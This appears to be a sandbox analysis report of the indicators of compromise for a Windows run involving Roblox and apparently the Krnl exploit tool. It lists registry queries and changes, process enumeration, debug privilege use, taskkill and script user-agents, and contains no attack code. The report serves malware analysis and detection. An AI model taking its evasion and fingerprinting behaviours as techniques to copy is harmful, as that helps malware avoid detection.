Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3652 taskkill.exe
1988 taskkill.exe

pid	process
3652	taskkill.exe
1988	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 16 IoCs

adware spyware

Modify Registry

T1112

Processes:

RobloxPlayerLauncher.exeRobloxPlayerLauncher.exeRobloxPlayerBeta.exeRobloxPlayerLauncher.exeRobloxPlayerBeta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerLauncher.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerLauncher.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerLauncher.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerLauncher.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\RobloxPlayerBeta.exe = "11000"	RobloxPlayerBeta.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerLauncher.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	RobloxPlayerBeta.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	RobloxPlayerBeta.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio	RobloxPlayerLauncher.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0"	RobloxPlayerLauncher.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\RobloxPlayerBeta.exe = "11000"	RobloxPlayerBeta.exe

Modifies data under HKEY_USERS 25 IoCs

Processes:

dwm.exechrome.exechrome.exesvchost.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133245122025494130"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\LastTelemetryChangeStamp = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Direct3D	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\LastTelemetryChangeStamp = "2"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe

Modifies registry class 64 IoCs

Processes:

RobloxPlayerLauncher.exeRobloxPlayerLauncher.exeRobloxPlayerLauncher.exesvchost.exechrome.exemsedge.exesvchost.exesvchost.exemsedge.exechrome.exechrome.exechrome.exesvchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\shell\open\command\ = "\"C:\\Program Files (x86)\\Roblox\\Versions\\RobloxStudioLauncherBeta.exe\" %1"	RobloxPlayerLauncher.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_CLASSES\ROBLOX-PLAYER\DEFAULTICON	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\URL Protocol	RobloxPlayerLauncher.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\DefaultIcon\ = "C:\\Program Files (x86)\\Roblox\\Versions\\version-1720baa3c1c34d9c\\RobloxPlayerLauncher.exe"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{E6698932-43D1-49F1-98C0-422A42DFFD65}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\shell	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\URL Protocol	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	msedge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\URL Protocol	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\DefaultIcon\ = "C:\\Program Files (x86)\\Roblox\\Versions\\version-1720baa3c1c34d9c\\RobloxPlayerLauncher.exe"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox\shell	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open\command	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open\command\ = "\"C:\\Program Files (x86)\\Roblox\\Versions\\version-1720baa3c1c34d9c\\RobloxPlayerLauncher.exe\" %1"	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open\command\ = "\"C:\\Program Files (x86)\\Roblox\\Versions\\version-1720baa3c1c34d9c\\RobloxPlayerLauncher.exe\" %1"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{7E8B11A8-D3A4-4731-BAF0-D67D1D2FFAFC}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{F17F842F-660A-4B2C-A5C8-5C1A21C56245}	svchost.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\shell\open\command	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox\shell\open	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{96476421-ECE5-4C0D-92D4-DDF1A20795FD}	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\DefaultIcon	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\DefaultIcon	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	chrome.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open\command	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open\command	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox\ = "URL: Roblox Protocol"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\URL Protocol	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox\URL Protocol	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\DefaultIcon\ = "C:\\Program Files (x86)\\Roblox\\Versions\\version-1720baa3c1c34d9c\\RobloxPlayerLauncher.exe"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{223B21B0-A5F9-432D-91FE-9A50CEC1DAE2}	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\shell\open\command	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\shell\open	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox\shell\open\command	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{CFBF09C1-3FAA-4972-9304-6C356BCE349F}	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\DefaultIcon	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\shell\open	RobloxPlayerLauncher.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\URL Protocol	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\DefaultIcon	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\DefaultIcon\ = "C:\\Program Files (x86)\\Roblox\\Versions\\RobloxStudioLauncherBeta.exe"	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\shell\open\command\ = "\"C:\\Program Files (x86)\\Roblox\\Versions\\version-1720baa3c1c34d9c\\RobloxPlayerLauncher.exe\" %1"	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player	RobloxPlayerLauncher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\shell	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\ = "URL: Roblox Protocol"	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\ = "URL: Roblox Protocol"	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\ = "URL: Roblox Protocol"	RobloxPlayerLauncher.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\shell\open\command	RobloxPlayerLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\roblox-player\DefaultIcon\ = "C:\\Program Files (x86)\\Roblox\\Versions\\version-1720baa3c1c34d9c\\RobloxPlayerLauncher.exe"	RobloxPlayerLauncher.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\ = "URL: Roblox Protocol"	RobloxPlayerLauncher.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

6016 reg.exe
2400 reg.exe
5828 reg.exe

pid	process
6016	reg.exe
2400	reg.exe
5828	reg.exe

NTFS ADS 2 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 671136.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 151894.crdownload:SmartScreen	msedge.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	1033	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	649	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exeCefSharp.BrowserSubprocess.exeKrnlUI.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exechrome.exeCefSharp.BrowserSubprocess.exemsedge.exemsedge.exeidentity_helper.exeRobloxPlayerLauncher.exemsedge.exemsedge.exemsedge.exe

pid	process
1652	chrome.exe
1652	chrome.exe
1660	CefSharp.BrowserSubprocess.exe
1660	CefSharp.BrowserSubprocess.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4252	CefSharp.BrowserSubprocess.exe
4252	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
4908	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
476	CefSharp.BrowserSubprocess.exe
1652	chrome.exe
1652	chrome.exe
2000	chrome.exe
2000	chrome.exe
6056	CefSharp.BrowserSubprocess.exe
6056	CefSharp.BrowserSubprocess.exe
4604	KrnlUI.exe
4604	KrnlUI.exe
4616	msedge.exe
4616	msedge.exe
2012	msedge.exe
2012	msedge.exe
4608	identity_helper.exe
4608	identity_helper.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
6044	msedge.exe
6044	msedge.exe
1144	msedge.exe
1144	msedge.exe
4120	msedge.exe
4120	msedge.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe
5204	RobloxPlayerLauncher.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

RobloxPlayerBeta.exeOpenWith.exeRobloxPlayerBeta.exeOpenWith.exe

pid process

2240 RobloxPlayerBeta.exe
6464 OpenWith.exe
3788 RobloxPlayerBeta.exe
1764 OpenWith.exe

pid	process
2240	RobloxPlayerBeta.exe
6464	OpenWith.exe
3788	RobloxPlayerBeta.exe
1764	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

chrome.exemsedge.exechrome.exechrome.exe

pid	process
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
1652	chrome.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
2012	msedge.exe
3596	chrome.exe
3596	chrome.exe
3596	chrome.exe
4188	chrome.exe
4188	chrome.exe
4188	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

krnl_beta.exechrome.exe7za.exe7za.exeCefSharp.BrowserSubprocess.exeKrnlUI.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exe

description	pid	process
Token: SeDebugPrivilege	3724	krnl_beta.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeRestorePrivilege	444	7za.exe
Token: 35	444	7za.exe
Token: SeSecurityPrivilege	444	7za.exe
Token: SeSecurityPrivilege	444	7za.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeRestorePrivilege	748	7za.exe
Token: 35	748	7za.exe
Token: SeSecurityPrivilege	748	7za.exe
Token: SeSecurityPrivilege	748	7za.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeDebugPrivilege	1660	CefSharp.BrowserSubprocess.exe
Token: SeDebugPrivilege	4604	KrnlUI.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	4604	KrnlUI.exe
Token: SeCreatePagefilePrivilege	4604	KrnlUI.exe
Token: SeDebugPrivilege	4252	CefSharp.BrowserSubprocess.exe
Token: SeDebugPrivilege	4908	CefSharp.BrowserSubprocess.exe
Token: SeShutdownPrivilege	1652	chrome.exe
Token: SeCreatePagefilePrivilege	1652	chrome.exe
Token: SeShutdownPrivilege	4604	KrnlUI.exe
Token: SeCreatePagefilePrivilege	4604	KrnlUI.exe
Token: SeShutdownPrivilege	1652	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exechrome.exe

pid	process
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
1652	chrome.exe
